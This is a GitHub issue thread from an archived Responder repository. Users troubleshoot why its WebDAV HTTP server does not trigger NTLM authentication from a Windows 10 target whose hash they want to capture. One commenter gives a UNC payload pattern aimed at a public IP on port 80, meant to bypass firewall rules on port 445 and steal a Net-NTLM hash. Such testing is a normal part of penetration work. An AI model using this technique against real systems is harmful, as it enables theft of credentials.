This repository has been archived by the owner on Aug 7, 2020. It is now read-only.

WebDav NTLM auth #143

Open
remi-cc opened this issue May 13, 2018 · 1 comment

Comments

remi-cc commented May 13, 2018

Hi all,

I tried to capture an NTLM hash with the WebDAV HTTP server but I didn't manage to...
Well, the victim's host is a Win 10 (fully updated) machine and the responder's host is a Kali VM.

  • Victim @ip : 192.168.1.55
  • responder @ip : 192.168.1.50

I modified the responder conf file to disable the SMB server, then executed: # responder -I eth0

When the victim asks for the test.pdf file ("OPTIONS /test.pdf HTTP/1.1"), responder answers ("HTTP/1.1 200 OK", but without the DAV HTTP header) but no NTLM auth follows (NTLM is not disabled in my Windows victim conf). And then, the victim requested the PROPFIND method without any answer (see the PCAP transformed into a TXT file, attached: WebDAV-wihout-NTLM-authen.txt).
It seems that the WebDAV server isn't on... Did I miss something?
PS: It works with the SMB protocol.

@lgandx, if you have 5 minutes to take a look, I would be grateful.

Regards,

Rémi

Hypnoze57 commented May 16, 2019

Hello, same issue I think. I'm trying to steal a Net-NTLM hash with a payload like \\publicIP@80\img.png to bypass outgoing firewall rules on 445.
Responder receives the HTTP PROPFIND WebDAV request but doesn't answer it.

Kali's and lgandx's git repos seem to be more up to date than this official one (see the IsWebDAV implementation in server/HTTP.py), but it still does not work.

Nobody has encountered this kind of problem?

EDIT: https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/

Regards,

Hypnoze.
